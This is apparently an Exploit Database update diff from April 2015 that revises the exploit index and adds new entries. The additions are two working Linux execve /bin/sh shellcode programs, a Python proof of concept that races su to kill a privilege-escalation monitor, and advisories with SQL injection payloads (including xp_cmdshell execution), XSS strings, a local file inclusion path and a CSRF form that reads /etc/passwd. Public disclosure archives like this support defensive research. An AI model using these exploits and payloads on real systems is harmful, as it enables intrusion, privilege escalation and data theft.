DB: 2015-04-30

15 new exploits

files.csv

@@ -33182,7 +33182,7 @@ id,file,description,date,author,platform,type,port
 36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
 36774,platforms/php/webapps/36774.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download Exploit",2015-04-15,"Necmettin COSKUN",php,webapps,0
 36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80
-36776,platforms/windows/dos/36776.py,"MS Windows (HTTP.sys) HTTP Request Parsing DoS (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
+36776,platforms/windows/dos/36776.py,"MS Windows (HTTP.sys) - HTTP Request Parsing DoS (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
 36777,platforms/php/webapps/36777.txt,"Wordpress Ajax Store Locator 1.2 - SQL Injection Vulnerability",2015-04-16,"Claudio Viviani",php,webapps,80
 36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 execve ""/bin/sh"" - shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0
 36779,platforms/win32/shellcode/36779.c,"win32/xp sp3 Create (""file.txt"") (83 bytes)",2015-04-17,"TUNISIAN CYBER",win32,shellcode,0
@@ -33193,7 +33193,7 @@ id,file,description,date,author,platform,type,port
 36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - admin/index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0
 36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Admin Password Manipulation CSRF",2012-02-15,"High-Tech Bridge SA",php,webapps,0
 36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0
-36788,platforms/windows/dos/36788.txt,"Oracle Outside-In DOCX File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0
+36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In DOCX File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0
 36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial Of Service Vulnerability",2011-12-18,anonymous,php,dos,0
 36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Parameter Cross Site Scripting Vulnerability",2012-02-16,"Daniel Godoy",php,webapps,0
 36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection Vulnerabilities",2012-02-16,tempe_mendoan,php,webapps,0
@@ -33216,8 +33216,13 @@ id,file,description,date,author,platform,type,port
 36811,platforms/php/remote/36811.rb,"Wordpress Creative Contact Form Upload Vulnerability",2015-04-21,metasploit,php,remote,80
 36812,platforms/php/remote/36812.rb,"Wordpress Work The Flow Upload Vulnerability",2015-04-21,metasploit,php,remote,80
 36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0
-36814,platforms/osx/dos/36814.c,"Mac OS X Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
+36814,platforms/osx/dos/36814.c,"Mac OS X - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80
+36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware 'url' Parameter URI Redirection Vulnerability",2012-02-18,sonyy,php,webapps,0
+36849,platforms/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x get.php v Parameter Arbitrary File Access",2012-02-20,"J. Greil",php,webapps,0
+36850,platforms/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x userlogdetail.php idclient Parameter SQL Injection",2012-02-20,"J. Greil",php,webapps,0
+36851,platforms/php/webapps/36851.txt,"F*EX 20100208/20111129-2 Multiple Cross Site Scripting Vulnerabilities",2012-02-20,muuratsalo,php,webapps,0
+36852,platforms/php/webapps/36852.txt,"TestLink Multiple SQL Injection Vulnerabilities",2012-02-20,"Juan M. Natal",php,webapps,0
 36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
 36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
 36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
@@ -33225,7 +33230,7 @@ id,file,description,date,author,platform,type,port
 36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0
 36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQLi",2015-04-23,"Felipe Molina",php,webapps,0
 36824,platforms/php/webapps/36824.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQLi #2",2015-04-23,"Felipe Molina",php,webapps,0
-36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
+36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
 36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0
 36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow (W7 - DEP Bypass)",2015-04-24,naxxo,windows,local,0
 36829,platforms/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow and Directory Traversal Vulnerabilities",2012-02-17,"Luigi Auriemma",windows,remote,0
@@ -33240,4 +33245,14 @@ id,file,description,date,author,platform,type,port
 36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
 36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
-36847,platforms/windows/dos/36847.py,"i.FTP 2.21 SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0
+36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0
+36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0
+36854,platforms/php/webapps/36854.txt,"Dolphin 7.0.x explanation.php explain Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0
+36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition",2015-04-29,"Ben Sheppard",linux,local,0
+36856,platforms/php/webapps/36856.txt,"Joomla! 'com_xvs' Component 'controller' Parameter Local File Include Vulnerability",2012-02-18,KedAns-Dz,php,webapps,0
+36857,platforms/lin_x86/shellcode/36857.c,"Linux x86 - Execve /bin/sh Shellcode Via Push (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0
+36858,platforms/lin_x86-64/shellcode/36858.c,"Linux x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
+36859,platforms/windows/local/36859.txt,"Foxit Reader PDF <= 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
+36860,platforms/php/webapps/36860.txt,"WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
+36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,"John Page",windows,webapps,5466
+36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80

platforms/lin_x86-64/shellcode/36858.c

@@ -0,0 +1,63 @@
+/*
+    #
+    # Execve /bin/sh Shellcode Via Push (Linux x86_64 23 bytes)
+    #
+    # Dying to be the shortest.
+    #
+    # Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com)
+    #
+    # 27 April 2015
+    #
+    # GPL
+    #
+
+
+    .global _start
+_start:
+    # char *const argv[]
+    xorl %esi, %esi
+
+    # 'h' 's' '/' '/' 'n' 'i' 'b' '/'
+    movq $0x68732f2f6e69622f, %rbx
+
+    # for '\x00'
+    pushq %rsi
+
+    pushq %rbx
+
+    pushq %rsp
+    # const char *filename
+    popq %rdi
+
+    # __NR_execve 59
+    pushq $59
+    popq %rax
+
+    # char *const envp[]
+    xorl %edx, %edx
+
+    syscall
+ */
+
+/*
+  gcc -z execstack push64.c
+
+  uname -r
+  3.19.3-3-ARCH
+ */
+
+#include <stdio.h>
+#include <string.h>
+
+int
+main(void)
+{
+  char *shellcode =3D "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56=
+\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";
+
+  printf("strlen(shellcode)=3D%d\n", strlen(shellcode));
+
+  ((void (*)(void))shellcode)();
+
+  return 0;
+}

platforms/lin_x86/shellcode/36857.c

@@ -0,0 +1,60 @@
+/*
+    #
+    # Execve /bin/sh Shellcode Via Push (Linux x86 21 bytes)
+    #
+    # Dying to be the shortest.
+    #
+    # Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com)
+    #
+    # 18 February 2015
+    #
+    # GPL
+    #
+
+
+    .global _start
+_start:
+    # char *const argv[]
+    xorl %ecx, %ecx
+
+    # 2 bytes, and both %eax and %edx were zeroed
+    mull %ecx
+
+    # __NR_execve 11
+    movb $11, %al
+
+    # for '\x00'
+    pushl %ecx
+    # 'h' 's' '/' '/'
+    pushl $0x68732f2f
+    # 'n' 'i' 'b' '/'
+    pushl $0x6e69622f
+
+    # const char *filename
+    movl %esp, %ebx
+
+    int $0x80
+ */
+
+/*
+  gcc -z execstack -m32 push.c
+
+  uname -r
+  3.19.3-3-ARCH
+ */
+
+#include <stdio.h>
+#include <string.h>
+
+int
+main(void)
+{
+  char *shellcode =3D "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68=
+\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+
+  printf("strlen(shellcode)=3D%d\n", strlen(shellcode));
+
+  ((void (*)(void))shellcode)();
+
+  return 0;
+}

platforms/linux/local/36855.py

@@ -0,0 +1,82 @@
+#[Title] Ninja privilege escalation detection and prevention system race condition
+#[Author] Ben 'highjack' Sheppard
+#[URL] http://highjack.github.io/
+#[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
+#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
+#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
+#[Software Link] http://forkbomb.org/ninja/
+#[Date] 29/04/2015
+#[Version] 0.1.3
+#[Tested on] Kali Linux
+#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg
+
+#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
+#https://www.youtube.com/watch?v=eA136fOsSeQ
+
+import pty, os, sys, subprocess
+pid, fd = pty.fork()
+
+#begin config
+user = "root"
+password  = "mypassword" #change this :)
+command = "killall -9 ninja"
+#end config
+
+
+def usage():
+	print """
+@@@  @@@  @@@   @@@@@@@@  @@@  @@@       @@@   @@@@@@    @@@@@@@  @@@  @@@  
+@@@  @@@  @@@  @@@@@@@@@  @@@  @@@       @@@  @@@@@@@@  @@@@@@@@  @@@  @@@  
+@@!  @@@  @@!  !@@        @@!  @@@       @@!  @@!  @@@  !@@       @@!  !@@  
+!@!  @!@  !@!  !@!        !@!  @!@       !@!  !@!  @!@  !@!       !@!  @!!  
+@!@!@!@!  !!@  !@! @!@!@  @!@!@!@!       !!@  @!@!@!@!  !@!       @!@@!@!   
+!!!@!!!!  !!!  !!! !!@!!  !!!@!!!!       !!!  !!!@!!!!  !!!       !!@!!!    
+!!:  !!!  !!:  :!!   !!:  !!:  !!!       !!:  !!:  !!!  :!!       !!: :!!   
+:!:  !:!  :!:  :!:   !::  :!:  !:!  !!:  :!:  :!:  !:!  :!:       :!:  !:!  
+::   :::   ::   ::: ::::  ::   :::  ::: : ::  ::   :::   ::: :::   ::  :::  
+ :   : :  :     :: :: :    :   : :   : :::     :   : :   :: :: :   :   ::: 
+ 
+[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
+[Author] Ben 'highjack' Sheppard
+[URL] http://highjack.github.io/
+ 
+[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
+It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
+The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
+ """
+ 
+
+executions = 0
+def check_procs():
+	p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
+	p2 = subprocess.Popen(["grep", "root"],  stdin=p1.stdout,  stdout=subprocess.PIPE)
+	p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
+	output = p3.communicate()[0]
+	if output != "":
+		if executions != 0:
+			sys.exit(0)
+		return True
+	else:
+		return False
+
+def kill_ninja():
+	if pid == 0:
+		os.execvp("su", ["su", user, "-c", command])
+	elif pid > 0:
+		try:
+			os.read(fd, 1024)
+			os.write(fd, password + "\n")
+			os.read(fd,1024)
+			os.wait()
+			os.close(fd)
+		except:
+			usage()
+			print "[+] Ninja is terminated"
+			sys.exit(0)
+			
+
+while True:
+	kill_ninja()
+	if (check_procs == True):
+		executions = executions + 1
+		kill_ninja()

platforms/php/webapps/36848.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52079/info
+
+Tiki Wiki CMS Groupware is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible. 
+
+http://www.example.com/tiki-featured_link.php?type=f&url=http://www.example2.com 

platforms/php/webapps/36849.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52081/info
+
+VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.
+
+VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/voxlog/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ==

platforms/php/webapps/36850.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/52081/info
+ 
+VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.
+ 
+VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected. 
+
+
+http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+
+
+http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+ 

platforms/php/webapps/36851.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52085/info
+
+F*EX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. 
+
+http://www.example.com/fup [id parameter]
+http://www.example.com/fup [to parameter]
+http://www.example.com/fup [from parameter] 

platforms/php/webapps/36852.txt

@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/52086/info
+
+TestLink is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1
+http://www.example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1
+http://www.example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND
+3653=BENCHMARK(5000000,MD5(1))
+http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7
+AND 5912=BENCHMARK(5000000,MD5(1))
+http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623
+AND 5912=BENCHMARK(5000000,MD5(1))
+http://www.example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622
+AND 5912=BENCHMARK(5000000,MD5(1))
+http://www.example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND
+5912=BENCHMARK(5000000,MD5(1))
+http://www.example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622
+OR 1=1
+http://www.example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622
+AND 5912=BENCHMARK(5000000,MD5(1))
+http://www.example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND
+5912=BENCHMARK(5000000,MD5(1)) 

platforms/php/webapps/36853.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/52088/info
+
+Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Dolphin 7.0.7 and prior versions are vulnerable. 
+
+http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='"><script>alert(/xss/)</script>
+http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='"><script>alert(/xss/)</script>
+http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='"><script>alert(/xss/)</script> 

platforms/php/webapps/36854.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52088/info
+ 
+Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+ 
+Dolphin 7.0.7 and prior versions are vulnerable. 
+
+http://www.example.com/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

platforms/php/webapps/36856.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52091/info
+
+The 'com_xvs' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 
+
+http://www.example.com/index.php?option=com_xvs&controller=../../[LFI]%00 

platforms/php/webapps/36860.txt

@@ -0,0 +1,143 @@
+Advisory ID: HTB23254
+Product: TheCartPress WordPress plugin
+Vendor: TheCartPress team
+Vulnerable Version(s): 1.3.9 and probably prior
+Tested Version: 1.3.9
+Advisory Publication:  April 8, 2015  [without technical details]
+Vendor Notification: April 8, 2015 
+Public Disclosure: April 29, 2015 
+Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284]
+CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302
+Risk Level: High 
+CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP code, disclose sensitive data, and perform Cross-Site Scripting attacks against users of WordPress installations with the vulnerable plugin.
+
+1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301
+
+Input passed via the "tcp_box_path" HTTP POST parameter passed to "/wp-admin/admin.php?page=checkout_editor_settings" URL is not properly verified before being used in PHP 'include()' function, and can be abused to include arbitrary local files via directory traversal sequences.
+
+In order to successfully exploit the vulnerability an attacker needs to have administrator privileges on WordPress installation, however this can be also exploited via CSRF vector to which the script is vulnerable as well. 
+
+Simple CSRF exploit below will execute the content of '/etc/passwd' file when a logged-in administrator will visit a page with it:
+
+<form action="http://wordpress/wp-admin/admin.php?page=checkout_editor_settings" method="post" name="main">
+<input type="hidden" name="tcp_save_fields"  value='1'>
+<input type="hidden" name="tcp_box_path"  value='../../../../../etc/passwd'>
+<input type="submit" id="btn">
+</form>
+<script>
+ document.main.submit();
+</script>
+
+
+
+2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300
+
+During the checkout process, many user-supplied HTTP POST parameters (see complete list in PoC)in "Shipping address" and "Billing address" sections are not being sanitized before being stored in the local database. 
+
+Simple mass-XSS PoC against "Billing address" section (PoC against "Shipping address" scetion is identical, just replace 'billing_' prefix with 'shipping_') will write several JS pop-up alerts into the application database:
+
+<form action="http://wordpress/shopping-cart/checkout/" method="post" name="main">
+<input type="hidden" name="selected_billing_id"  value='1'>
+<input type="hidden" name="selected_billing_address"  value='new'>
+<input type="hidden" name="billing_firstname"  value='"><script>alert(/immuniweb/);</script>'>
+<input type="hidden" name="billing_lastname"  value='"><script>alert(/immuniweb/);</script>'>
+<input type="hidden" name="billing_company"  value='"><script>alert(/immuniweb/);</script>'>
+<input type="hidden" name="billing_tax_id_number"  value='"><script>alert(/immuniweb/);</script>'>
+<input type="hidden" name="billing_country_id"  value='AF'>
+<input type="hidden" name="billing_region_id"  value=''>
+<input type="hidden" name="billing_region"  value=''>
+<input type="hidden" name="billing_city"  value='"><script>alert(/immuniweb/);</script>'>
+<input type="hidden" name="billing_street"  value='"><script>alert(/immuniweb/);</script>'>
+<input type="hidden" name="billing_street_2"  value='"><script>alert(/immuniweb/);</script>'>
+<input type="hidden" name="billing_postcode"  value='"><script>alert(/immuniweb/);</script>'>
+<input type="hidden" name="billing_telephone_1"  value='"><script>alert(/immuniweb/);</script>'>
+<input type="hidden" name="billing_telephone_2"  value='"><script>alert(/immuniweb/);</script>'>
+<input type="hidden" name="billing_fax"  value='"><script>alert(/immuniweb/);</script>'>
+<input type="hidden" name="billing_email"  value='mail@mail.com'>
+<input type="hidden" name="tcp_continue"  value=''>
+<input type="hidden" name="tcp_step"  value='1'>
+<input type="submit" id="btn">
+</form>
+
+
+A non-authenticated attacker may inject malicious HTML and JS code that will be stored in the application database, and available to any non-authenticated user on the following URL:
+
+http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order
+
+As well as on the following URL accessible to WordPress administrator only:
+
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php
+
+
+3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302
+
+Any non-authenticated user may browse orders of other users due to broken authentication mechanism. To reproduce the vulnerability an attacker shall first open the following URL:
+http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id]
+
+And just after open the following URL to see full order details:
+http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order
+
+Moreover, the order ID can be easily predicted, as every new order ID is an incremented value of the previous one. This enables non-authenticated remote attacker to steal all currently-existing orders.
+
+
+4) Multiple XSS in TheCartPress WordPress plugin (against administrator only): CVE-2015-3300
+
+4.1 Input passed via the "search_by" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php&search_by=--%3E%%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+
+4.2 Input passed via the "address_id", "address_name", "firstname", "lastname", "street", "city", "postcode", "email" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_name=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&firstname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&lastname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&street=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&city=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&postcode=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&email=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+
+4.3 Input passed via the "post_id" and "rel_type" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+
+4.4 Input passed via the "post_type" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+
+http://wordpress/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+2015-04-08 Vendor Alerted via emails.
+2015-04-17 Vendor Alerted via contact form and emails.
+2015-04-17 Vendor Alerted via WordPress Support Forums.
+2015-04-27 Fix Requested via emails.
+2015-04-29 Public disclosure.
+
+Currently we are not aware of any official solution for this vulnerability.
+According to the vendor the plugin will not be supported anymore since 1st of June 2015: http://thecartpress.com/extend/important-note-nota-importante/
+
+We recommend disabling or removing the vulnerable plugin as a workaround.
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23254 - https://www.htbridge.com/advisory/HTB23254 - Multiple vulnerabilities in TheCartPress Wordpress plugin.
+[2] TheCartPress Wordpress plugin- http://thecartpress.com/ - Professional WordPress eCommerce Plugin. Use it as Shopping Cart, Catalog or Framework.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

platforms/php/webapps/36862.txt

@@ -0,0 +1,31 @@
+OS Solution OSProperty 2.8.0 was vulnerable to an unauthenticated SQL
+injection in the country_id parameter of the request made to retrieve a
+list of states for a given country. The version was not bumped when the
+vulnerability was fixed, but if you download after April 27th, you
+downloaded a fixed version.
+
+http://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property
+
